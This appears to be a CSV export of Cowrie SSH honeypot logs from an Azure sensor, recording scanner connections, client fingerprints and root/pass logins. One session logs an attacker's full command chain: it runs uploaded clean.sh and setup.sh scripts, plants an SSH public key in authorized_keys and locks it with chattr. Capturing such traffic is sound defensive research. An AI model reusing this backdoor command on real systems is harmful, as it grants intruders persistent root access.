+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:30.326 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:30.326160Z"",""src_ip"":""194.169.175.106"",""session"":""b6ffce5f261f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:30.500 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""084386fa7ae5039bcf6f07298a05a227"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:30.498544Z"",""src_ip"":""194.169.175.106"",""session"":""b6ffce5f261f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:32.589 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":2.3016562461853027,""message"":""Connection lost after 2 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:32.588946Z"",""src_ip"":""194.169.175.106"",""session"":""b6ffce5f261f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:42:19.824 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.135.23.106"",""src_port"":47755,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""00cb0117e314"",""protocol"":""ssh"",""message"":""New connection: 147.135.23.106:47755 (10.0.0.4:2222) [session: 00cb0117e314]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:42:19.823435Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:42:30.921 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":11.096426010131836,""message"":""Connection lost after 11 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:42:30.921168Z"",""src_ip"":""147.135.23.106"",""session"":""00cb0117e314""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:51.211 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""198.235.24.6"",""src_port"":58364,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""ecb546af3451"",""protocol"":""ssh"",""message"":""New connection: 198.235.24.6:58364 (10.0.0.4:2222) [session: ecb546af3451]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:51.210064Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:52.257 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:52.256303Z"",""src_ip"":""198.235.24.6"",""session"":""ecb546af3451""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:53.780 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:53.777554Z"",""src_ip"":""198.235.24.6"",""session"":""ecb546af3451""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:57.150 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":5.937931537628174,""message"":""Connection lost after 5 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:57.149297Z"",""src_ip"":""198.235.24.6"",""session"":""ecb546af3451""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:23:56.122 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""38.88.252.187"",""src_port"":40435,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""19639ea22419"",""protocol"":""ssh"",""message"":""New connection: 38.88.252.187:40435 (10.0.0.4:2222) [session: 19639ea22419]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:23:56.121602Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:23:56.196 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0722343921661377,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:23:56.195313Z"",""src_ip"":""38.88.252.187"",""session"":""19639ea22419""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 2:07:50.039 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""167.172.151.86"",""src_port"":44034,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""ebe0c0bc3bf2"",""protocol"":""ssh"",""message"":""New connection: 167.172.151.86:44034 (10.0.0.4:2222) [session: ebe0c0bc3bf2]"",""sensor"":""server01"",""timestamp"":""2024-09-21T02:07:50.037947Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 2:07:50.047 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh-0.1"",""message"":""Remote SSH version: SSH-2.0-libssh-0.1"",""sensor"":""server01"",""timestamp"":""2024-09-21T02:07:50.046938Z"",""src_ip"":""167.172.151.86"",""session"":""ebe0c0bc3bf2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 2:07:50.057 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.017077922821044922,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T02:07:50.056329Z"",""src_ip"":""167.172.151.86"",""session"":""ebe0c0bc3bf2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:21:21.616 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.185.132.204"",""src_port"":55262,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""aaa36b27802b"",""protocol"":""ssh"",""message"":""New connection: 147.185.132.204:55262 (10.0.0.4:2222) [session: aaa36b27802b]"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:21:21.614549Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:21:21.775 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.15813398361206055,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:21:21.774450Z"",""src_ip"":""147.185.132.204"",""session"":""aaa36b27802b""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:22.793 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""128.199.225.7"",""src_port"":44786,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""8fe108a89762"",""protocol"":""ssh"",""message"":""New connection: 128.199.225.7:44786 (10.0.0.4:2222) [session: 8fe108a89762]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:22.789365Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:22.793 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh2_1.11.0"",""message"":""Remote SSH version: SSH-2.0-libssh2_1.11.0"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:22.792106Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:23.053 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""5741d3852f927da511861c6662f84439"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group16-sha512"",""diffie-hellman-group18-sha512"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519"",""ssh-ed25519-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""rijndael-cbc@lysator.liu.se"",""aes192-cbc"",""aes128-cbc"",""arcfour128"",""arcfour"",""3des-cbc""],""macCS"":[""hmac-sha2-256"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1"",""hmac-sha1-etm@openssh.com"",""hmac-sha1-96"",""hmac-md5"",""hmac-md5-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 5741d3852f927da511861c6662f84439"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:23.050366Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.139 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""pass"",""message"":""login attempt [root/pass] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.136800Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.386 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.592932939529419,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.384887Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.484 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""5.182.211.148"",""src_port"":57380,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""de6aa0229f39"",""protocol"":""ssh"",""message"":""New connection: 5.182.211.148:57380 (10.0.0.4:2222) [session: de6aa0229f39]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.481345Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.484 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.482864Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.567 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""5f904648ee8964bef0e8834012e26003"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.565121Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.816 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""pass"",""message"":""login attempt [root/pass] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.815629Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.852 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.850594Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.853 AM",,"{""eventid"":""cowrie.command.input"",""input"":""chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \""ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\"" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \""\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"""",""message"":""CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \""ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\"" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \""\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"""",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.852451Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.945 AM",,"{""eventid"":""cowrie.session.file_download"",""duplicate"":false,""outfile"":""var/lib/cowrie/downloads/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b"",""shasum"":""8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b"",""destfile"":""/root/.ssh/authorized_keys"",""message"":""Saved redir contents with SHA-256 8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b to var/lib/cowrie/downloads/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.941899Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.947 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6"",""size"":200,""shasum"":""4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6"",""duplicate"":false,""duration"":0.0936119556427002,""message"":""Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.943478Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.955 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""clean.sh"",""outfile"":""var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e"",""shasum"":""d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e"",""message"":""SFTP Uploaded file \""clean.sh\"" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.948358Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.992 